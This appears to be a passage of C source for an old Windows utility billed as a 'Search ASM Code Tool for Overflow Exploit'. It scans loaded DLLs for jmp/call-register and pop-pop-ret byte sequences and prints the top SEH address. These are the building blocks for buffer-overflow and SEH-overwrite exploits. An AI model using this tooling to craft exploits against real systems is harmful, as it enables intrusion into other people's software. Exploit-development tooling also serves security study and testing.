if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 ) printf ("Microsoft Windows XP "); if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2 ) printf ("Microsoft Windows 2003 ");
// Test for product type.
if( bOsVersionInfoEx ) { if ( osvi.wProductType == VER_NT_WORKSTATION ) { if( osvi.wSuiteMask & VER_SUITE_PERSONAL ) printf ( "Personal " ); else printf ( "Professional " ); }
else if ( osvi.wProductType == VER_NT_SERVER ) { if( osvi.wSuiteMask & VER_SUITE_DATACENTER ) printf ( "DataCenter Server " ); else if( osvi.wSuiteMask & VER_SUITE_ENTERPRISE ) printf ( "Advanced Server " ); else printf ( "Server " ); } }
// Display version, service pack (if any), and build number.
if ( osvi.dwMajorVersion <= 4 ) { printf ("version %d.%d %s (Build %d)\n", osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.szCSDVersion, osvi.dwBuildNumber & 0xFFFF); } else { printf ("%s (Build %d)\n", osvi.szCSDVersion, osvi.dwBuildNumber & 0xFFFF); } break; } return TRUE; }
int main(int argc, char *argv[]) { bool bLoaded = false; HINSTANCE h; char *pDllName = "msvcrt.dll"; char *pRegister = "ebx"; bool bEAX = false, bEBX = false, bECX = false, bEDX = false, bEDI = false, bESI = false, bESP = false, bEBP = false, bRET = false; int count = 0, maybe = 0;
printf("Search ASM Code Tool for Overflow Exploit V%s\n" "Code by lion (lion@cnhonker.net)\n" "Welcome to HUC website http://www.cnhonker.com\n\n" , VERSION); if(argc < 2) { usage(argv[0]); return -1; } else if(argc == 2 && argv[1][1] == 'v') { DisplaySystemVersion(); return 1; }
for(int i=1;i<argc;i+=2) { if(strlen(argv[i]) != 2) { usage(argv[0]); return -1; } // check parameter if(i == argc-1) { usage(argv[0]); return -1; } switch(argv[i][1]) { case 'r': pRegister = argv[i+1]; if(stricmp(pRegister, "eax") == 0) bEAX = true; else if(stricmp(pRegister, "ebx") == 0) bEBX = true; else if(stricmp(pRegister, "ecx") == 0) bECX = true; else if(stricmp(pRegister, "edx") == 0) bEDX = true; else if(stricmp(pRegister, "edi") == 0) bEDI = true; else if(stricmp(pRegister, "esi") == 0) bESI = true; else if(stricmp(pRegister, "esp") == 0) bESP = true; else if(stricmp(pRegister, "ebp") == 0) bEBP = true; else if(stricmp(pRegister, "xpret") == 0) bRET = true; else { usage(argv[0]); return -1; } break; case 'd': pDllName = argv[i+1]; break; } } DisplaySystemVersion(); printf("Search Mode or Register: %s\n", pRegister);
// no dll for search. if(stricmp(pDllName, "nodll") == 0) { h = (HINSTANCE__ *)0x7FFa0000; printf("Start search ASM code in: 0x7FFA0000\n\n", pRegister); } else { // Load DLL. h = GetModuleHandle(pDllName); if(h == NULL) { h = LoadLibrary(pDllName); if(h == NULL) { printf("Loading DLL error: %s\n", pDllName); return -1; } printf("Start Search ASM Code in: %s\n\n", pDllName);
bLoaded = true; } }
// Search TOP SEH
unsigned int *un; unsigned int sehaddr;
HMODULE hk = LoadLibrary("kernel32"); un = (unsigned int *)GetProcAddress(hk, "SetUnhandledExceptionFilter");
// un = (int *)UnhandledExceptionFilter; _asm{ mov eax,un add eax,5 mov ebx,[eax] mov sehaddr, ebx }
printf("0x%X\tTOP SEH\n\n", sehaddr);
BYTE* ptr = (BYTE*)h; bool done = false;
// Start Search ASM Code for(ULONG y = 0; !done; y++) { try { if(ptr[y] == 0xFF ) { ULONG pos = (ULONG)ptr + y; if(bEAX) { if(ptr[y+1] == 0xD0) { printf("0x%X\tcall eax\r\n", pos); count++; } else if(ptr[y+1] == 0xE0) { printf("0x%X\tjmp eax\r\n", pos); count++; } } else if(bEBX) { if(ptr[y+1] == 0xD3) { printf("0x%X\tcall ebx\r\n", pos); count++; } else if(ptr[y+1] == 0xE3) { printf("0x%X\tjmp ebx\r\n", pos); count++; } } else if(bECX) { if(ptr[y+1] == 0xD1) { printf("0x%X\tcall ecx\r\n", pos); count++; } else if(ptr[y+1] == 0xE1) { printf("0x%X\tjmp ecx\r\n", pos); count++; } } else if(bEDX) { if(ptr[y+1] == 0xD2) { printf("0x%X\tcall edx\r\n", pos); count++; } else if(ptr[y+1] == 0xE2) { printf("0x%X\tjmp edx\r\n", pos); count++; } } else if(bEDI) { if(ptr[y+1] == 0xD7) { printf("0x%X\tcall edi\r\n", pos); count++; } else if(ptr[y+1] == 0xE7) { printf("0x%X\tjmp edi\r\n", pos); count++; } } else if(bESI) { if(ptr[y+1] == 0xD6) { printf("0x%X\tcall esi\r\n", pos); count++; } else if(ptr[y+1] == 0xE6) { printf("0x%X\tjmp esi\r\n", pos); count++; } } else if(bESP) { if(ptr[y+1] == 0xD4) { printf("0x%X\tcall esp\r\n", pos); count++; } else if(ptr[y+1] == 0xE4) { printf("0x%X\tjmp esp\r\n", pos); count++; } } else if(bEBP) { if(ptr[y+1] == 0xD5) { printf("0x%X\tcall ebp\r\n", pos); count++; } else if(ptr[y+1] == 0xE5) { printf("0x%X\tjmp ebp\r\n", pos); count++; } } } else if(ptr[y] == 0xC3) {
// Start search pop reg, pop reg, ret addr. // if(bRET || bEBX) if(bRET) { if((ptr[y-1] >= 0x58 && ptr[y-1] <= 0x5F) && (ptr[y-2] >= 0x58 && ptr[y-2] <= 0x5F)) { ULONG pos = (ULONG)ptr + y - 2; printf("0x%X\tpop reg, pop reg, ret\r\n", pos); count++; } ///* else if((ptr[y-1] >= 0x58 && ptr[y-1] <= 0x5F) && (ptr[y-6] == 0xB8 || ptr[y-6] == 0xBA || ptr[y-6] == 0xBE || ptr[y-6] == 0xBF)&& (ptr[y-7] >= 0x58 && ptr[y-7] <= 0x5F)) { ULONG pos = (ULONG)ptr + y - 7; printf("0x%X\tpop reg, pop reg, ret\n", pos); count++; } //*/ /* // Search maybe available addr for use